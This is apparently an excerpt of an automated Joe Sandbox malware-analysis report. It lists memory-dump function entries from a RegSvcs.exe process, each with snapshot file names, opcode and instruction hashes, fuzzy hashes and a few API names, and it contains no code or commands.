                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "jB
                                                                      • API String ID: 0-3276335117
                                                                      • Opcode ID: 1f66a87aa27601af76395a073f8366dbe3f1549dff5cf4ca866cc54e43ced975
                                                                      • Instruction ID: 5e1d8c0b1515ecfa31faa1c568337e693052fbc6b42adfdfb911d364570a270e
                                                                      • Opcode Fuzzy Hash: 1f66a87aa27601af76395a073f8366dbe3f1549dff5cf4ca866cc54e43ced975
                                                                      • Instruction Fuzzy Hash: D3C08CB6C080028FC5002F00AC0201AB9316B0320CF082039E40931133FA32F625950F
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0c7625dc8a02050d2483af0f75c91bb5bc7877375563f0b19dd77e196208affe
                                                                      • Instruction ID: 4df813ee5f95e841ab821c98b8b5526f3f5ae33236fdb9f70e9fd3558806e740
                                                                      • Opcode Fuzzy Hash: 0c7625dc8a02050d2483af0f75c91bb5bc7877375563f0b19dd77e196208affe
                                                                      • Instruction Fuzzy Hash: FA22A371A087119BC725DE18D9806ABB3E1BFC4319F19893ED9C6A7385D738B811CB87
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 597fc938b3c7907baa933e39222336cfaebac5f4fa080b08cb07518a9a992129
                                                                      • Instruction ID: 4fc516d3c2b442602e552858b68be7734632adc4e96252525e150f64ed3c5c82
                                                                      • Opcode Fuzzy Hash: 597fc938b3c7907baa933e39222336cfaebac5f4fa080b08cb07518a9a992129
                                                                      • Instruction Fuzzy Hash: A3C12DB6E016258FCB18CF68D89166EB7F1FF89310F59456DD816AB391DB34AC01CB90
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 43780e1e2e3a758066292245f2d39f1e33420cfffaa8785e26d50e06e5c09363
                                                                      • Instruction ID: ecd98b3e30f16e247b6e37ac7b6d2412abfb1e49c209f28e4dabdc3486cf8122
                                                                      • Opcode Fuzzy Hash: 43780e1e2e3a758066292245f2d39f1e33420cfffaa8785e26d50e06e5c09363
                                                                      • Instruction Fuzzy Hash: BCA11934204A01CFD7158F29D850AF6B7A2FF87310F5945AAD1968B3E2D738A852CB99
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 562f13b772a4c344ec1b8f71eb9ccd99c74adc9a64e63efcfea3790b2c30ed1d
                                                                      • Instruction ID: 9e2cb37ed21e11fbad960dddf737aaa980f21f536591a4909efc8a2909d6cdd4
                                                                      • Opcode Fuzzy Hash: 562f13b772a4c344ec1b8f71eb9ccd99c74adc9a64e63efcfea3790b2c30ed1d
                                                                      • Instruction Fuzzy Hash: 8B816BB2A093208BC718DF24D85026BBBF2EFD1314F59CA2DE4C59B394E7789905C786
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 153fd498e0abb89b475a44109399731ffe09bfd7c5c5609ef9d685e9fddd8eb3
                                                                      • Instruction ID: 16ab1bb8e5813cbead69206b7097d26a452845dfa9c2a9323bffdb95a06fe9c3
                                                                      • Opcode Fuzzy Hash: 153fd498e0abb89b475a44109399731ffe09bfd7c5c5609ef9d685e9fddd8eb3
                                                                      • Instruction Fuzzy Hash: 3B81C0342042028BE724DF19C980A2BB3F1FF99314F55866DF9949B3A1EB75DC52CB4A
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 846d745e799860ef9ea4e03aa7af84ae1be1fd3816dfe5359127a6eef7797514
                                                                      • Instruction ID: 50f91a7135ac995fafd84abb40a2ff73bb47e1f903fd8f1524f89d133c35058d
                                                                      • Opcode Fuzzy Hash: 846d745e799860ef9ea4e03aa7af84ae1be1fd3816dfe5359127a6eef7797514
                                                                      • Instruction Fuzzy Hash: B461B974A083918FC7258F38C88096F7BE1AF96310F0882BEE8D44B392D679DC45C796
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 94ca20dc4f76e8c3e8d02b75f9c402b180f2256a0ed4e9f610f16215ed658aa6
                                                                      • Instruction ID: 54b1615ece0800edf578a66f6fa2aba7240dcbf02494f9453b14f9bc813aead1
                                                                      • Opcode Fuzzy Hash: 94ca20dc4f76e8c3e8d02b75f9c402b180f2256a0ed4e9f610f16215ed658aa6
                                                                      • Instruction Fuzzy Hash: 39411732B0C2654BC7149E2D8D5427ABBD29FC5218F0DC57EA8C9DB7C7E57898009785
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 00e3dc9464124a9ac3936808daaa6cb7d54e00a4530c727067c019b61550166a
                                                                      • Instruction ID: 3e828dc637c6aee99513c29835b99d357d4520004c741a88f318c34ece8bb8a3
                                                                      • Opcode Fuzzy Hash: 00e3dc9464124a9ac3936808daaa6cb7d54e00a4530c727067c019b61550166a
                                                                      • Instruction Fuzzy Hash: E941E071E043258BDB10DF49D8922ABB372FF66314F19411ADC84AB354E739AD01CBA9
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f822273db6c68e011de364cdba3ced214ba853329870a82143a1b3826a5d9c10
                                                                      • Instruction ID: f2730a4bd8400e6ccca1806e7c2ae68197e714b3aafd468424d48539a12bf7a5
                                                                      • Opcode Fuzzy Hash: f822273db6c68e011de364cdba3ced214ba853329870a82143a1b3826a5d9c10
                                                                      • Instruction Fuzzy Hash: 963179221487538BDB148928C9911B7FB51EFB2360F18473FC492177C1EB38A929D3E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: d451ddeb5618286ed8eacd871469a17d4232f0dfe3db3b93bda8811cc9b43ae3
                                                                      • Instruction ID: f14b1e3348f7832c914038d0d787e57ee05bed21178a428e04cc6a3a25562b9c
                                                                      • Opcode Fuzzy Hash: d451ddeb5618286ed8eacd871469a17d4232f0dfe3db3b93bda8811cc9b43ae3
                                                                      • Instruction Fuzzy Hash: 5A311474610601CFD719CF2AC990A3377A2FB8A310B248E69D5566BBE5D774EC21CB88
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b56e36517da7a27e33ef45fdc150f204755ea86d778f10d59046157777f86f8c
                                                                      • Instruction ID: 57171615dec06f4b3ea34e7e1adccaef3f23bda716e905d6b8a786efa676c01b
                                                                      • Opcode Fuzzy Hash: b56e36517da7a27e33ef45fdc150f204755ea86d778f10d59046157777f86f8c
                                                                      • Instruction Fuzzy Hash: 8E318478B00502DFD318CF69DC40A327367FB86315B65863AE512A73E4DB74EC268A9D
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7799af4de0b1a804fd633f699550772e22bf464a91c8aab1c1220e8e50eaa2f3
                                                                      • Instruction ID: f4efb102148d56746155fcf0a69e0a073b2616fb0f7bc1048f615d5ae5911f58
                                                                      • Opcode Fuzzy Hash: 7799af4de0b1a804fd633f699550772e22bf464a91c8aab1c1220e8e50eaa2f3
                                                                      • Instruction Fuzzy Hash: 7C2148719092108BE318CF1AC85576BFBA1EBC9328F19A52EE895573C0D37DDC418795
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 664478ecc493b7daad9ed5f4edac06f81c9f2eac4be26fbb9471f6581503d05a
                                                                      • Instruction ID: 3802dad517a1dce3a34934a6d2a34ff46c5f85f7b1ffb06216fa93cce7cae3e8
                                                                      • Opcode Fuzzy Hash: 664478ecc493b7daad9ed5f4edac06f81c9f2eac4be26fbb9471f6581503d05a
                                                                      • Instruction Fuzzy Hash: 53210774610B01CFD325CF29C84096677B2FF82314B19856DD0961BB76E734EC52CB88
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                      • Instruction ID: 64260c404912ea7eadd8c0e068931427c058d1959da23024316477ca1ba720c8
                                                                      • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                      • Instruction Fuzzy Hash: 83112933A052D10EC3128D3C8410565FFA30EA7234F29939EF4B49B2D2DA269D8B8359
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f053cbb5fb3d7dc403b9872d41e17036f9bd54e3a02cbcbb3c617f8fe574da9e
                                                                      • Instruction ID: 9ac58ec8d4b3439cda35f7244ec872c65e6fe70fd35cd3954e032617cd07918a
                                                                      • Opcode Fuzzy Hash: f053cbb5fb3d7dc403b9872d41e17036f9bd54e3a02cbcbb3c617f8fe574da9e
                                                                      • Instruction Fuzzy Hash: CD015EF1B017124BD620AE55E4C1727A3A8AB9070CF58453EE9049B343EB79FC1586DA
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 1731410d0e3cc220da59a8d1e9685258228a98747c5e126bdcfafed42aad0d04
                                                                      • Instruction ID: 8b14ff6e9f909d0a458ac4e63c91713bd7563fb29c01f731cd10e6b3bc0629ea
                                                                      • Opcode Fuzzy Hash: 1731410d0e3cc220da59a8d1e9685258228a98747c5e126bdcfafed42aad0d04
                                                                      • Instruction Fuzzy Hash: EDF0F935500208BBD2204B079C41D37736EFB9E768F101329F525232E1E362ED2187E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                      • Instruction ID: 678eaee0e22883ac7a801a5a92a95a4c58884562fe07dcc7c3908c64aa7d63e3
                                                                      • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                                                                      • Instruction Fuzzy Hash: 5AD0A7B1948BB10E57588D3804E04B7FBE8EA47613B18159FE4D2E7205D224DC41469C
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9b7598ff860c6c584cc28cc9e2ee4f827b81178b3db001d57e5e8ec4a7167bec
                                                                      • Instruction ID: 776a1f7dd0c074e79f55533e911544892ec85f46c384d1e8a4e462c15b4e92e9
                                                                      • Opcode Fuzzy Hash: 9b7598ff860c6c584cc28cc9e2ee4f827b81178b3db001d57e5e8ec4a7167bec
                                                                      • Instruction Fuzzy Hash: 97D022B86481003B0248CB09CC4AE33B77CC387200F002034BE05C3350C610EC2182EE
                                                                      APIs
                                                                      • RtlExpandEnvironmentStrings.NTDLL(00000000,FF5DFD53,0000001E,00000000,00000000,0=), ref: 004291F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000004.00000002.1874065386.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_4_2_400000_RegSvcs.jbxd
                                                                      Similarity
                                                                      • API ID: EnvironmentExpandStrings
                                                                      • String ID: 0=$0=$ER$P&
                                                                      • API String ID: 237503144-76498936
                                                                      • Opcode ID: d0c15af12cbfad86f6864dd0905774a4f0b166c0b463e71c1bc931c37c03ad9b
                                                                      • Instruction ID: a2bc4232f0b587c6731111968c4b9dfd6b547f1d994af41bba96082cdda02b35
                                                                      • Opcode Fuzzy Hash: d0c15af12cbfad86f6864dd0905774a4f0b166c0b463e71c1bc931c37c03ad9b
                                                                      • Instruction Fuzzy Hash: 5E31A074A08B518FD7718F28D84036BBBF2FB85710F149E2DC4A69BB91D775A8428F84